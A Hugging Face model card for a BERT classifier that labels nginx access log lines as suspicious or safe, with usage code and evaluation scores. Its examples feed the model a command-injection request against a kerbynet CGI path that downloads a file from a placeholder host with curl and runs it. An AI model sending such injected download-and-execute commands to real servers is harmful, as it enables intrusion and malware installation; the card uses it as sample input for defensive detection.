File size: 2,293 Bytes
c087a29
 
 
a6d0aa2
c087a29
10406b1
c087a29
 
 
 
 
 
 
 
 
 
10406b1
a6d0aa2
c087a29
 
 
 
 
 
 
10406b1
a6d0aa2
c087a29
 
 
 
 
 
 
10406b1
c087a29
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
f5ec36c
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
---
language: en
license: apache-2.0
pipeline_tag: text-classification
---
# Log Inspector
Pretrained model on nginx access logs. Based on [bert-base-cased](https://huggingface.co/bert-base-cased).

## How to use
Here is how to use this model to inspect a log.

Given text must be parsed as like:  
`"path: <path>; ref:<referrer>; ua:<user agent>;"`

```python
>>> from transformers import pipeline
>>> inspector = pipeline('text-classification', model="u-haru/log-inspector")
>>> inspector('path: /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://O.O.O.O/zero;sh zero;"; ref:-; ua:-;')
[{'label': 'LABEL_0', 'score': 0.9999788999557495}]
```
class 0 is a suspicious log. class 1 is a safe log.

With simpletransformer:
```python
>>> from simpletransformers.classification import ClassificationModel
>>> model = ClassificationModel('bert', "u-haru/log-inspector", num_labels=2, use_cuda=(use_cuda and torch.cuda.is_available()), args=param)
>>> predictions, raw_outputs = model.predict(['path: /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://O.O.O.O/zero;sh zero;"; ref:-; ua:-;'])
>>> print(predictions)
[0]
```

Evaluate or training:
```python
>>> from simpletransformers.classification import ClassificationModel
>>> model = ClassificationModel('bert', "u-haru/log-inspector", num_labels=2, use_cuda=(use_cuda and torch.cuda.is_available()), args=param)
>>> data = [["Suspicious log",0],["Safe log",1]]
>>> df = pd.DataFrame(data)

>>> model.train_model(df)
>>> result, model_outputs, wrong_predictions = model.eval_model(df)
>>> print(result)
{'mcc': 1.0, 'tp': 1, 'tn': 1, 'fp': 0, 'fn': 0, 'auroc': 1.0, 'auprc': 1.0, 'eval_loss': 1.8238850316265598e-05}
```

I trained with 9500 access logs. Here is evaluation score:
```json
{'mcc': 0.993114718313972, 'tp': 1639, 'tn': 729, 'fp': 0, 'fn': 7, 'auroc': 0.9994166345815686, 'auprc': 0.9997937194890235, 'eval_loss': 0.020282083051662583}
```
and evaluation with 10000 logs:
```json
{'mcc': 0.8494104528008076, 'tp': 9964, 'tn': 26, 'fp': 0, 'fn': 10, 'auroc': 0.9999845752803442, 'auprc': 0.9999999597891697, 'eval_loss': 0.0058870489358901976}
```

## Training
Source codes are available here: [github.com/u-haru/log-inspector](https://github.com/u-haru/log-inspector)